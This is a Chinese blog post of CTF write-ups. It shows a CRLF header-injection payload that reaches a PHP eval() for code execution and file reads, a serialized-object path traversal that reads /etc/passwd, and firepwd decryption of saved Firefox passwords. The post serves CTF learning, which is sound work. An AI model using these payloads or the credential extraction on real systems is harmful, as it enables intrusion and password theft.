CrewCTF 2022 + DCTF 22 + TAMUctf 2022 一些writeup
本文来自csdn的??shu天??,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主:blog.csdn.net/weixin_46081055 看看ヾ(@ ?ω? @)ノ!!
CrewCTF 2022
web - CuaaS
(难绷,这个图是我最后补截的,一激动flag粘框里头去了,懒得再截了)
给了源码
index.php
<?php
if($_SERVER['REQUEST_METHOD'] == "POST" and isset($_POST['url']))
{
clean_and_send($_POST['url']); //输入的url传给clean_and_send处理
}
function clean_and_send($url){
$uncleanedURL = $url; // should be not used anymore(这是原本的注释提示,$uncleanedURL应该是突破口
$values = parse_url($url);
$host = explode('/',$values['host']);
$query = $host[0];
$data = array('host'=>$query);
$cleanerurl = "http://127.0.0.1/cleaner.php";
$stream = file_get_contents($cleanerurl, true, stream_context_create(['http' => [
'method' => 'POST',
'header' => "X-Original-URL: $uncleanedURL", //直接将$uncleanedURL http传给cleaner.php
'content' => http_build_query($data)
]
]));
echo $stream;
}
?>
cleaner.php
<?php
if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){ //只允许本地访问
die("<img src='https://imgur.com/x7BCUsr.png'>");
}
echo "<br>There your cleaned url: ".$_POST['host'];
echo "<br>Thank you For Using our Service!";
function tryandeval($value){
echo "<br>How many you visited us ";
eval($value); //命令执行处
}
foreach (getallheaders() as $name => $value) { //getallheaders()在apache中使用,接受http请求头信息,可以看www.cnblogs.com/woods1815/p/9940823.html
if ($name == "X-Visited-Before"){
tryandeval($value);
}}
?>
http的构造传输让人想起CRLF攻击
思路:index.php中$uncleanedURL构造X-Visited-Before:\$value,在cleaner.php的tryandeval函数中执行
payload:
url=1%0d%0aX-Visited-Before:print_r(scandir('/'));%0d%0a
flag在/maybethisistheflag
url=1%0d%0aX-Visited-Before:highlight_file('/maybethisistheflag');%0d%0a
DCTF 22
(这个小龙真的好可爱)
Forensics - Hidden Fox
I let Firefox save some of my stuff while browsing, it should be written somewhere in it’s directory, can you find it? Flag is in two parts.
Author: Pixel#1111
附件给了个压缩包,有火狐浏览器的配置文件和用户文件
浏览记录里面有一部分flag _th15_p455w0rd}
在 Firefox\Profiles\br873ssy.default-release\places.sqlite的moz_places表
另一半在登陆密码里面,需要利用key4.db和logins.json解密,脚本github.com/lclevy/firepwd
python3 firepwd.py -d /home/kali/Desktop/firepwd-master/Firefox/Profiles/br873ssy.default-release/
flag为 dctf{1_b00km4rk3d_th15_p455w0rd}
其实表单里面还存了一坨贼像flag的,给我整半天
TAMUctf 2022
web - Lock Out
I seem to have locked myself out of my admin panel! Can you find a way back in for me?
抓登陆口的包,根据返回的源码传参得到flag
?PrintFlag=PrintFlag
web - Serial Killer
I’m trying a new way to display files on my website. Can you try to break it for me?
Tip: The flag is located in the /etc/passwd file.
利用PHPSESSI进行LFI,(…/被过滤,url编码绕过)
O:7:"GetPage":1:{s:4:"file";s:35:"%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd";}
↓base64
Tzo3OiJHZXRQYWdlIjoxOntzOjQ6ImZpbGUiO3M6MzU6IiUyZSUyZSUyZiUyZSUyZSUyZiUyZSUyZS9ldGMvcGFzc3dkIjt9
这个比赛500分左右的取证真的很难,但是我ctftime蹲了几天都没蹲到wp,之后有缘再复现好了 ctftime.org/event/1557/tasks/
本文来自csdn的??shu天??,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主:blog.csdn.net/weixin_46081055 看看ヾ(@ ?ω? @)ノ!!
